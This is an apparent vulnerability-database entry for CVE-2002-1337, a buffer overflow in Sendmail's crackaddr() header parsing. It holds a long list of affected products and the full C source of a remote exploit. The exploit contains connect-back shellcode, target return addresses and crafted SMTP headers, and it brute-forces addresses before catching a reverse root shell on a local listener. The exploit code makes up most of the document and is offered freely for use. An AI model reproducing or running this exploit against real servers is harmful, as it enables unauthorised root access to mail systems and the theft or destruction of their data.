ID
VAR-E-200303-0035
CVE
cve_id: | CVE-2002-1337 | Trust: 1.9 |
EDB ID
22314
TITLE
Sendmail 8.12.x - Header Processing Buffer Overflow (2) - Unix remote Exploit
Trust: 0.6
DESCRIPTION
Sendmail 8.12.x - Header Processing Buffer Overflow (2). CVE-2002-1337CVE-4502 . remote exploit for Unix platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | sendmail | model: | - | scope: | eq | version: | 8.12.x | Trust: 1.0 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 11.04 | Trust: 0.6 |
vendor: | wind | model: | river systems platform sa | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | wind | model: | river systems bsd/os | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | wind | model: | river systems bsd/os | scope: | eq | version: | 4.3.1 | Trust: 0.3 |
vendor: | wind | model: | river systems bsd/os | scope: | eq | version: | 4.2 | Trust: 0.3 |
vendor: | sun | model: | solaris 9 x86 | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | solaris | scope: | eq | version: | 9 | Trust: 0.3 |
vendor: | sun | model: | solaris 8 x86 | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | solaris 8 sparc | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | solaris 7.0 x86 | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | solaris | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | sun | model: | solaris 2.6 x86 | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | solaris | scope: | eq | version: | 2.6 | Trust: 0.3 |
vendor: | sun | model: | lx50 | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | cobalt raq xtr | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | cobalt raq | scope: | eq | version: | 550 | Trust: 0.3 |
vendor: | sun | model: | cobalt raq | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | sun | model: | cobalt raq | scope: | eq | version: | 3 | Trust: 0.3 |
vendor: | sun | model: | cobalt qube | scope: | eq | version: | 3 | Trust: 0.3 |
vendor: | sun | model: | cobalt manageraq3 3000r-mr | scope: | - | version: | - | Trust: 0.3 |
vendor: | sun | model: | cobalt cacheraq | scope: | eq | version: | 4 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.19 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.18 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.17 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.16 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.15 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.14 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.13 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.12 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.11 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.10 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.9 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.8 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.7 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.6 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.5 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.4 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.3 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.2 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5.1 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | eq | version: | 6.5 | Trust: 0.3 |
vendor: | sgi | model: | freeware | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 3.0.2 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.2.4 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.2.3 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.2.2 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.2.1 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.1.4 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.1.3 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.1.2 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.1.1 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail for nt | scope: | eq | version: | 3.0.2 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail for nt | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail for nt | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail for nt | scope: | eq | version: | 2.6.1 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail for nt | scope: | eq | version: | 2.6 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail advanced message server | scope: | eq | version: | 1.3 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail advanced message server | scope: | eq | version: | 1.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 3.0.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.2.4 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.2.3 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.2.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.2.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.1.4 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.1.3 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.1.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.1.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | eq | version: | 2.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail for nt | scope: | eq | version: | 3.0.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail for nt | scope: | eq | version: | 3.0.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail for nt | scope: | eq | version: | 3.0 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail for nt | scope: | eq | version: | 2.6.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail for nt | scope: | eq | version: | 2.6 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.7 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.6 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.5 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.4 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.3 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail beta7 | scope: | eq | version: | 8.12 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail beta5 | scope: | eq | version: | 8.12 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail beta16 | scope: | eq | version: | 8.12 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail beta12 | scope: | eq | version: | 8.12 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail beta10 | scope: | eq | version: | 8.12 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.12.0 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.11.6 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.11.5 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.11.4 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.11.3 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.11.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.11.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.11 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.10.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.10.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.10 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.9.3 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.9.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.9.1 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.9.0 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 8.8.8 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 5.65 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 5.61 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | eq | version: | 5.59 | Trust: 0.3 |
vendor: | sco | model: | unixware | scope: | eq | version: | 7.1.3 | Trust: 0.3 |
vendor: | sco | model: | unixware | scope: | eq | version: | 7.1.1 | Trust: 0.3 |
vendor: | sco | model: | open unix | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.6 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.5.3 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.5.2 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.5.1 | Trust: 0.3 |
vendor: | netbsd | model: | netbsd | scope: | eq | version: | 1.5 | Trust: 0.3 |
vendor: | ibm | model: | z/os v1r4 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | z/os v1r2 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | os/390 v2r8 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | os/390 v2r10 | scope: | - | version: | - | Trust: 0.3 |
vendor: | ibm | model: | mvs | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | mpe/ix | scope: | eq | version: | 6.5 | Trust: 0.3 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 11.22 | Trust: 0.3 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 11.11 | Trust: 0.3 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 11.0 | Trust: 0.3 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.20 | Trust: 0.3 |
vendor: | hp | model: | hp-ux | scope: | eq | version: | 10.10 | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.22 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.11 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.04 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | hp-ux b.11.00 | scope: | - | version: | - | Trust: 0.3 |
vendor: | hp | model: | alphaserver sc | scope: | - | version: | - | Trust: 0.3 |
vendor: | gentoo | model: | linux rc2 | scope: | eq | version: | 1.4 | Trust: 0.3 |
vendor: | gentoo | model: | linux rc1 | scope: | eq | version: | 1.4 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 5.0 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.7 | Trust: 0.3 |
vendor: | freebsd | model: | freebsd | scope: | eq | version: | 4.6 | Trust: 0.3 |
vendor: | sgi | model: | irix | scope: | ne | version: | 6.5.20 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | ne | version: | 3.0.3 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | ne | version: | 2.2.5 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail switch | scope: | ne | version: | 2.1.5 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail for nt | scope: | ne | version: | 3.0.3 | Trust: 0.3 |
vendor: | sendmail | model: | inc sendmail for nt | scope: | ne | version: | 2.6.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | ne | version: | 3.0.3 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | ne | version: | 2.2.5 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail switch | scope: | ne | version: | 2.1.5 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail for nt | scope: | ne | version: | 3.0.3 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail for nt | scope: | ne | version: | 2.6.2 | Trust: 0.3 |
vendor: | sendmail | model: | consortium sendmail | scope: | ne | version: | 8.12.8 | Trust: 0.3 |
vendor: | openwall | model: | gnu/*/linux | scope: | ne | version: | 1.0 | Trust: 0.3 |
vendor: | juniper | model: | networks junos | scope: | ne | version: | 5.1 | Trust: 0.3 |
vendor: | juniper | model: | networks junos | scope: | ne | version: | 5.0 | Trust: 0.3 |
EXPLOIT
// source: https://www.securityfocus.com/bid/6991/info
Sendmail is prone to a remotely buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers.
Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid.
Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree.
/* Sendmail <8.12.8 crackaddr() exploit by bysin */
/* from the l33tsecurity crew */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
int maxarch=1;
struct arch {
char *os;
int angle,nops;
unsigned long aptr;
} archs[] = {
{"Slackware 8.0 with sendmail 8.11.4",138,1,0xbfffbe34}
};
/////////////////////////////////////////////////////////
#define LISTENPORT 2525
#define BUFSIZE 4096
char code[]= /* 116 bytes */
"\xeb\x02" /* jmp <shellcode+4> */
"\xeb\x08" /* jmp <shellcode+12> */
"\xe8\xf9\xff\xff\xff" /* call <shellcode+2> */
"\xcd\x7f" /* int $0x7f */
"\xc3" /* ret */
"\x5f" /* pop %edi */
"\xff\x47\x01" /* incl 0x1(%edi) */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\x6a\x01" /* push $0x1 */
"\x6a\x02" /* push $0x2 */
"\x54" /* push %esp */
"\x59" /* pop %ecx */
"\xb0\x66" /* mov $0x66,%al */
"\x31\xdb" /* xor %ebx,%ebx */
"\x43" /* inc %ebx */
"\xff\xd7" /* call *%edi */
"\xba\xff\xff\xff\xff" /* mov $0xffffffff,%edx */
"\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */
"\x31\xca" /* xor %ecx,%edx */
"\x52" /* push %edx */
"\xba\xfd\xff\xff\xff" /* mov $0xfffffffd,%edx */
"\xb9\xff\xff\xff\xff" /* mov $0xffffffff,%ecx */
"\x31\xca" /* xor %ecx,%edx */
"\x52" /* push %edx */
"\x54" /* push %esp */
"\x5e" /* pop %esi */
"\x6a\x10" /* push $0x10 */
"\x56" /* push %esi */
"\x50" /* push %eax */
"\x50" /* push %eax */
"\x5e" /* pop %esi */
"\x54" /* push %esp */
"\x59" /* pop %ecx */
"\xb0\x66" /* mov $0x66,%al */
"\x6a\x03" /* push $0x3 */
"\x5b" /* pop %ebx */
"\xff\xd7" /* call *%edi */
"\x56" /* push %esi */
"\x5b" /* pop %ebx */
"\x31\xc9" /* xor %ecx,%ecx */
"\xb1\x03" /* mov $0x3,%cl */
"\x31\xc0" /* xor %eax,%eax */
"\xb0\x3f" /* mov $0x3f,%al */
"\x49" /* dec %ecx */
"\xff\xd7" /* call *%edi */
"\x41" /* inc %ecx */
"\xe2\xf6" /* loop <shellcode+81> */
"\x31\xc0" /* xor %eax,%eax */
"\x50" /* push %eax */
"\x68\x2f\x2f\x73\x68" /* push $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* push $0x6e69622f */
"\x54" /* push %esp */
"\x5b" /* pop %ebx */
"\x50" /* push %eax */
"\x53" /* push %ebx */
"\x54" /* push %esp */
"\x59" /* pop %ecx */
"\x31\xd2" /* xor %edx,%edx */
"\xb0\x0b" /* mov $0xb,%al */
"\xff\xd7" /* call *%edi */
;
void header() {
printf("\nSendmail <8.12.8 crackaddr() exploit by bysin\n");
printf(" from the l33tsecurity crew \n\n");
}
void printtargets() {
unsigned long i;
header();
printf("\t Target\t Addr\t\t OS\n");
printf("\t-------------------------------------------\n");
for (i=0;i<maxarch;i++) printf("\t* %d\t\t 0x%08x\t %s\n",i,archs[i].aptr,archs[i].os);
printf("\n");
}
void writesocket(int sock, char *buf) {
if (send(sock,buf,strlen(buf),0) <= 0) {
printf("Error writing to socket\n");
exit(0);
}
}
void readsocket(int sock, int response) {
char temp[BUFSIZE];
memset(temp,0,sizeof(temp));
if (recv(sock,temp,sizeof(temp),0) <= 0) {
printf("Error reading from socket\n");
exit(0);
}
if (response != atol(temp)) {
printf("Bad response: %s\n",temp);
exit(0);
}
}
int readutil(int sock, int response) {
char temp[BUFSIZE],*str;
while(1) {
fd_set readfs;
struct timeval tm;
FD_ZERO(&readfs);
FD_SET(sock,&readfs);
tm.tv_sec=1;
tm.tv_usec=0;
if(select(sock+1,&readfs,NULL,NULL,&tm) <= 0) return 0;
memset(temp,0,sizeof(temp));
if (recv(sock,temp,sizeof(temp),0) <= 0) {
printf("Error reading from socket\n");
exit(0);
}
str=(char*)strtok(temp,"\n");
while(str && *str) {
if (atol(str) == response) return 1;
str=(char*)strtok(NULL,"\n");
}
}
}
#define NOTVALIDCHAR(c) (((c)==0x00)||((c)==0x0d)||((c)==0x0a)||((c)==0x22)||(((c)&0x7f)==0x24)||(((c)>=0x80)&&((c)<0xa0)))
void findvalmask(char* val,char* mask,int len) {
int i;
unsigned char c,m;
for(i=0;i<len;i++) {
c=val[i];
m=0xff;
while(NOTVALIDCHAR(c^m)||NOTVALIDCHAR(m)) m--;
val[i]=c^m;
mask[i]=m;
}
}
void fixshellcode(char *host, unsigned short port) {
unsigned long ip;
char abuf[4],amask[4],pbuf[2],pmask[2];
if ((ip = inet_addr(host)) == -1) {
struct hostent *hostm;
if ((hostm=gethostbyname(host)) == NULL) {
printf("Unable to resolve local address\n");
exit(0);
}
memcpy((char*)&ip, hostm->h_addr, hostm->h_length);
}
abuf[3]=(ip>>24)&0xff;
abuf[2]=(ip>>16)&0xff;
abuf[1]=(ip>>8)&0xff;
abuf[0]=(ip)&0xff;
pbuf[0]=(port>>8)&0xff;
pbuf[1]=(port)&0xff;
findvalmask(abuf,amask,4);
findvalmask(pbuf,pmask,2);
memcpy(&code[33],abuf,4);
memcpy(&code[38],amask,4);
memcpy(&code[48],pbuf,2);
memcpy(&code[53],pmask,2);
}
void getrootprompt() {
int sockfd,sin_size,tmpsock,i;
struct sockaddr_in my_addr,their_addr;
char szBuffer[1024];
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Error creating listening socket\n");
return;
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(LISTENPORT);
my_addr.sin_addr.s_addr = INADDR_ANY;
memset(&(my_addr.sin_zero), 0, 8);
if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) {
printf("Error binding listening socket\n");
return;
}
if (listen(sockfd, 1) == -1) {
printf("Error listening on listening socket\n");
return;
}
sin_size = sizeof(struct sockaddr_in);
if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) {
printf("Error accepting on listening socket\n");
return;
}
writesocket(tmpsock,"uname -a\n");
while(1) {
fd_set readfs;
FD_ZERO(&readfs);
FD_SET(0,&readfs);
FD_SET(tmpsock,&readfs);
if(select(tmpsock+1,&readfs,NULL,NULL,NULL)) {
int cnt;
char buf[1024];
if (FD_ISSET(0,&readfs)) {
if ((cnt=read(0,buf,1024)) < 1) {
if(errno==EWOULDBLOCK || errno==EAGAIN) continue;
else {
printf("Connection closed\n");
return;
}
}
write(tmpsock,buf,cnt);
}
if (FD_ISSET(tmpsock,&readfs)) {
if ((cnt=read(tmpsock,buf,1024)) < 1) {
if(errno==EWOULDBLOCK || errno==EAGAIN) continue;
else {
printf("Connection closed\n");
return;
}
}
write(1,buf,cnt);
}
}
}
close(tmpsock);
close(sockfd);
return;
}
int main(int argc, char **argv) {
struct sockaddr_in server;
unsigned long ipaddr,i,bf=0;
int sock,target;
char tmp[BUFSIZE],buf[BUFSIZE],*p;
if (argc <= 3) {
printf("%s <target ip> <myip> <target number> [bruteforce start addr]\n",argv[0]);
printtargets();
return 0;
}
target=atol(argv[3]);
if (target < 0 || target >= maxarch) {
printtargets();
return 0;
}
if (argc > 4) sscanf(argv[4],"%x",&bf);
header();
fixshellcode(argv[2],LISTENPORT);
if (bf && !fork()) {
getrootprompt();
return 0;
}
bfstart:
if (bf) {
printf("Trying address 0x%x\n",bf);
fflush(stdout);
}
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Unable to create socket\n");
exit(0);
}
server.sin_family = AF_INET;
server.sin_port = htons(25);
if (!bf) {
printf("Resolving address... ");
fflush(stdout);
}
if ((ipaddr = inet_addr(argv[1])) == -1) {
struct hostent *hostm;
if ((hostm=gethostbyname(argv[1])) == NULL) {
printf("Unable to resolve address\n");
exit(0);
}
memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
}
else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
if (!bf) {
printf("Address found\n");
printf("Connecting... ");
fflush(stdout);
}
if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
printf("Unable to connect\n");
exit(0);
}
if (!bf) {
printf("Connected!\n");
printf("Sending exploit... ");
fflush(stdout);
}
readsocket(sock,220);
writesocket(sock,"HELO yahoo.com\r\n");
readsocket(sock,250);
writesocket(sock,"MAIL FROM: spiderman@yahoo.com\r\n");
readsocket(sock,250);
writesocket(sock,"RCPT TO: MAILER-DAEMON\r\n");
readsocket(sock,250);
writesocket(sock,"DATA\r\n");
readsocket(sock,354);
memset(buf,0,sizeof(buf));
p=buf;
for (i=0;i<archs[target].angle;i++) {
*p++='<';
*p++='>';
}
*p++='(';
for (i=0;i<archs[target].nops;i++) *p++=0xf8;
*p++=')';
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];
*p++=0;
sprintf(tmp,"Full-name: %s\r\n",buf);
writesocket(sock,tmp);
sprintf(tmp,"From: %s\r\n",buf);
writesocket(sock,tmp);
p=buf;
archs[target].aptr+=4;
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];
for (i=0;i<0x14;i++) *p++=0xf8;
archs[target].aptr+=0x18;
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];
for (i=0;i<0x4c;i++) *p++=0x01;
archs[target].aptr+=0x4c+4;
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];
for (i=0;i<0x8;i++) *p++=0xf8;
archs[target].aptr+=0x08+4;
*p++=((char*)&archs[target].aptr)[0];
*p++=((char*)&archs[target].aptr)[1];
*p++=((char*)&archs[target].aptr)[2];
*p++=((char*)&archs[target].aptr)[3];
for (i=0;i<0x20;i++) *p++=0xf8;
for (i=0;i<strlen(code);i++) *p++=code[i];
*p++=0;
sprintf(tmp,"Subject: AAAAAAAAAAA%s\r\n",buf);
writesocket(sock,tmp);
writesocket(sock,".\r\n");
if (!bf) {
printf("Exploit sent!\n");
printf("Waiting for root prompt...\n");
if (readutil(sock,451)) printf("Failed!\n");
else getrootprompt();
}
else {
readutil(sock,451);
close(sock);
bf+=4;
goto bfstart;
}
}
Trust: 1.0
EXPLOIT LANGUAGE
c
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Header Processing Buffer Overflow (2)
Trust: 1.0
CREDITS
bysin
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2002-1337 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 22314 | Trust: 1.9 |
db: | BID | id: | 6991 | Trust: 1.9 |
db: | EDBNET | id: | 44506 | Trust: 0.6 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2002-1337 | Trust: 1.6 |
url: | https://www.securityfocus.com/bid/6991/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/22314/ | Trust: 0.6 |
url: | http://www-1.ibm.com/services/continuity/recover1.nsf/mss/mss-oar-e01-2003.0794.1 | Trust: 0.3 |
url: | http://www.slackware.org/lists/archive/viewer.php?l=slackware-security&y=2003&m=slackware-security.286398 | Trust: 0.3 |
url: | http://ftp.support.compaq.com/patches/public/readmes/unix/t64v51ab21-c0103500-17099-es-20030226.readme | Trust: 0.3 |
url: | http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/51181 | Trust: 0.3 |
url: | http://www.sendmail.org/ | Trust: 0.3 |
url: | http://www.info.apple.com/usen/security/security_updates.html | Trust: 0.3 |
url: | http://ftp1.support.compaq.com/public/unix/v5.0a/t64v50ab17-c0031300-16884-es-20030211.readme | Trust: 0.3 |
url: | http://ftp.support.compaq.com/patches/public/readmes/unix/t64v51b20-c0169800-16980-es-20030218.readme | Trust: 0.3 |
url: | http://ftp.support.compaq.com/patches/public/readmes/unix/t64v51bb1-c0003900-16874-es-20030211.readme | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/22313 | Trust: 0.3 |
url: | http://www.cert.org/advisories/ca-2003-07.html | Trust: 0.3 |
url: | http://www.sendmail.org/8.12.8.html | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/22314 | Trust: 0.3 |
url: | http://www.sendmail.com | Trust: 0.3 |
url: | http://www.sendmail.org | Trust: 0.3 |
SOURCES
db: | BID | id: | 6991 |
db: | EXPLOIT-DB | id: | 22314 |
db: | EDBNET | id: | 44506 |
LAST UPDATE DATE
2022-07-27T09:23:53.289000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 6991 | date: | 2007-09-22T00:30:00 |
SOURCES RELEASE DATE
db: | BID | id: | 6991 | date: | 2003-03-02T00:00:00 |
db: | EXPLOIT-DB | id: | 22314 | date: | 2003-03-02T00:00:00 |
db: | EDBNET | id: | 44506 | date: | 2003-03-02T00:00:00 |